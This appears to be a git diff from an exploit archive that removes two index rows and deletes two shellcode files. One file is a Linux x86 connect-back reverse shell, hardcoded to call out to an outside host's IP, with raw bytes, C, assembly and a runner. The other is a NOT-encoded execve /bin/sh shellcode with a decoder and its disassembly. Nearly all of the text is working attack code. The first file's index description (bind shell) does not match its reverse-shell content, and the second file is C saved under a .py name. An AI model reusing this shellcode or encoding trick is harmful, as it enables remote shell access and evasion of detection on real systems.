diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 8eaee23cf..f3c018488 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -670,7 +670,6 @@ id,file,description,date,author,type,platform
 43672,shellcodes/generator/43672.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
 43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
-43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43677,shellcodes/linux_x86/43677.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables --flush) Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43679,shellcodes/linux_x86/43679.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
 43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
@@ -950,7 +949,6 @@ id,file,description,date,author,type,platform
 46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
 46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
 46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86
-46523,shellcodes/linux_x86/46523.py,"Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
 46524,shellcodes/linux_x86/46524.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
 46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
 46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
diff --git a/shellcodes/linux_x86/43675.c b/shellcodes/linux_x86/43675.c
deleted file mode 100644
index d044afcc1..000000000
--- a/shellcodes/linux_x86/43675.c
+++ /dev/null
@@ -1,154 +0,0 @@
-/* linux x86 shellcode by eSDee of Netric (www.netric.org)
- * 131 byte - connect back shellcode (port=0xb0ef)
- */     
-
-#include <stdio.h>
-
-char
-shellcode[] = 
-        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
-        "\x06\x51\xb1\x01\x51\xb1\x02\x51"
-        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
-        "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
-        "\x68\x41\x42\x43\x44\x66\x68\xb0"
-        "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
-        "\x10\x53\x57\x52\x89\xe1\xb3\x03"
-        "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
-        "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
-        "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
-        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
-        "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
-        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
-        "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
-        "\x2f\x62\x69\x89\xe3\x50\x53\x89"
-        "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
-        "\x01\xcd\x80";
-
-int
-c_code()
-{
-        char *argv[2];
-        char *sockaddr = "\x02\x00"             //  Address family
-                         "\xef\xb0"             //  port
-                         "\x00\x00\x00\x00"     //  sin_addr
-                         "\x00\x00\x00\x00"
-                         "\x00\x00\x00\x00";
-
-        int sock;
-
-        sock = socket(2, 1, 6);
-        if (connect(sock, sockaddr, 16) < 0) exit();
-
-        dup2(sock, 0);
-        dup2(sock, 1);
-        dup2(sock, 2);
-
-        argv[0] = "//bin/sh";
-        argv[1] = NULL;
-
-        execve(argv[0], &argv[0], NULL);
-        exit();
-}
-
-int
-asm_code()
-{
-        __asm(" # sock = socket(2, 1, 6);
-                xorl    %eax,   %eax
-                xorl    %ebx,   %ebx
-                xorl    %ecx,   %ecx
-                pushl   %ecx
-                movb    $6,     %cl             # IPPROTO_TCP
-                pushl   %ecx
-                movb    $1,     %cl             # SOCK_STREAM
-                pushl   %ecx
-                movb    $2,     %cl             # AF_INET
-                pushl   %ecx
-                movl    %esp,   %ecx
-                movb    $1,     %bl             # SYS_SOCKET
-                movb    $102,   %al             # SYS_socketcall
-                int     $0x80
-
-                # connect(sock, sockaddr, 16)
-                movl    %eax,   %edx
-                xorl    %eax,   %eax
-                xorl    %ecx,   %ecx
-                pushl   %ecx
-                pushl   %ecx
-                pushl   $0x44434241             # ip address
-                pushw   $0xefb0                 # port
-                movb    $0x02,  %cl             # address family
-                pushw   %cx
-                movl    %esp,   %edi
-                movb    $16,    %bl             # sizeof(sockaddr)
-                pushl   %ebx
-                pushl   %edi
-                pushl   %edx                    # sock
-                movl    %esp,   %ecx
-                movb    $3,     %bl             # SYS_CONNECT
-                movb    $102,   %al             # SYS_socketcall
-                int     $0x80           
-                xorl    %ecx,   %ecx
-                cmpl    %eax,   %ecx
-                je CONNECTED
-
-                # exit()
-                xorl    %eax,   %eax
-                movb    $1,     %al             # SYS_exit
-                int     $0x80
-
-                CONNECTED:
-                # dup2(sock, 0);
-                xorl    %eax,   %eax
-                movb    $63,    %al             # SYS_dup2
-                movl    %edx,   %ebx            # sock
-                int     $0x80
-
-                # dup2(sock, 1);
-                xorl    %eax,   %eax
-                movb    $63,    %al             # SYS_dup2
-                movl    %edx,   %ebx            # sock
-                movb    $1,     %cl             # stdout
-                int     $0x80
-
-                # dup2(sock, 2);
-                xorl    %eax,   %eax
-                movb    $63,    %al             # SYS_dup2
-                movl    %edx,   %ebx            # sock
-                movb    $2,     %cl             # stderr
-                int     $0x80
-
-                # execve(argv[0], &argv[0], NULL);
-                xorl    %eax,   %eax
-                xorl    %edx,   %edx
-                pushl   %eax
-                pushl   $0x68732f6e             # the string
-                pushl   $0x69622f2f             # //bin/sh
-                movl    %esp,   %ebx
-                pushl   %eax
-                pushl   %ebx
-                movl    %esp,   %ecx
-                movb    $11,    %al             # SYS_execve
-                int     $0x80
-
-                # exit()
-                xorl    %eax,   %eax
-                movb    $1,     %al             # SYS_exit
-                int     $0x80
-                ");
-}
-
-int
-main()
-{
-        void (*funct)();
-
-        shellcode[33] = 81;     /* ip of www.netric.org :) */
-        shellcode[34] = 17;
-        shellcode[35] = 46;
-        shellcode[36] = 156;
-
-        (long) funct = &shellcode; 
-        funct();        
-        return 0;
-}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46523.py b/shellcodes/linux_x86/46523.py
deleted file mode 100755
index 7e3920a8c..000000000
--- a/shellcodes/linux_x86/46523.py
+++ /dev/null
@@ -1,99 +0,0 @@
-/*
-; Date: 02/03/2019
-; NOT-Encoder.py
-; Author: Daniele Votta
-; Description: This program encode shellcode with NOT technique.
-; Tested on: i686 GNU/Linux
-; Shellcode Length:25
-
-#!/usr/bin/python
-# Python NOT Encoder
-
-# Execve /bin/sh
-shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
-
-encoded = ""
-encoded2 = ""
-
-print 'Encoded shellcode...'
-
-for x in bytearray(shellcode):
-	# NOT Encoding
-	y = ~x
-	encoded += '\\x'
-	encoded += '%02x' % (y & 0xff)
-
-	encoded2 += '0x'
-	encoded2 += '%02x,' % (y & 0xff)
-
-print encoded +"\n"
-print encoded2
-print 'Len: %d' % len(bytearray(shellcode))
-*/
-
-#include<stdio.h>
-#include<string.h>
-
-/*
-
-; NOT-Decoder.asm
-; Author: Daniele Votta
-; Description: This program decode shellcode with NOT technique.
-; Tested on: i686 GNU/Linux
-; Shellcode Length:44
-; JMP | CALL | POP | Techniques
-
-NOT-Decoder:     file format elf32-i386
-
-Disassembly of section .text:
-
-08048080 <_start>:
- 8048080:	eb 0c                	jmp    804808e <call_decoder>
-
-08048082 <decoder>:
- 8048082:	5e                   	pop    esi
- 8048083:	31 c9                	xor    ecx,ecx
- 8048085:	b1 19                	mov    cl,0x19
-
-08048087 <decode>:
- 8048087:	f6 16                	not    BYTE PTR [esi]
- 8048089:	46                   	inc    esi
- 804808a:	e2 fb                	loop   8048087 <decode>
- 804808c:	eb 05                	jmp    8048093 <EncodedShellcode>
-
-0804808e <call_decoder>:
- 804808e:	e8 ef ff ff ff       	call   8048082 <decoder>
-
-08048093 <EncodedShellcode>:
- 8048093:	ce                   	into   
- 8048094:	3f                   	aas    
- 8048095:	af                   	scas   eax,DWORD PTR es:[edi]
- 8048096:	97                   	xchg   edi,eax
- 8048097:	d0 d0                	rcl    al,1
- 8048099:	8c 97 97 d0 9d 96    	mov    WORD PTR [edi-0x69622f69],ss
- 804809f:	91                   	xchg   ecx,eax
- 80480a0:	76 1c                	jbe    80480be <__bss_start+0x12>
- 80480a2:	af                   	scas   eax,DWORD PTR es:[edi]
- 80480a3:	76 1d                	jbe    80480c2 <__bss_start+0x16>
- 80480a5:	ac                   	lods   al,BYTE PTR ds:[esi]
- 80480a6:	76 1e                	jbe    80480c6 <__bss_start+0x1a>
- 80480a8:	4f                   	dec    edi
- 80480a9:	f4                   	hlt    
- 80480aa:	32                   	.byte 0x32
- 80480ab:	7f                   	.byte 0x7f
-[+] Extract Shellcode ... 
-"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f"
-
-======================= POC Daniele Votta =======================
-*/
-
-/* NOT Encoded Execve /bin/sh */
-unsigned char code[] = \
-"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f";
-
-int main()
-{
-	printf("Shellcode Length:  %d\n", strlen(code));
-	int (*ret)() = (int(*)())code;
-	ret();
-}
\ No newline at end of file